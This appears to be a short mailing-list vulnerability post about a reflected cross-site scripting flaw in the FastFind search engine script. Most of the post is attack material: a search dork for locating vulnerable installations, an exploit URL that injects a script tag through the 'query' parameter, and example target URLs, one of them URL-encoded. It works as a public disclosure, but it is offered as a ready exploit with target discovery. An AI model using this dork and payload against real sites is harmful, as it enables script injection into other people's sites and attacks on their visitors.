<<< Date Index >>>     <<< Thread Index >>>

Sorry....My Message With Out Live Site....



XSS IN FastFind...
DORK:
"Powered by FastFind - Search Engine Script"
Exploit:
http://[target]/[path]/index.php?query=<script>alert(1)</script>&type=simple
references:
http://www.interspire.com/fastfind/

Example:
http://www.target.com/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple
http://www.target.com/search/index.php?query=<script>alert(1)</script>&type=simple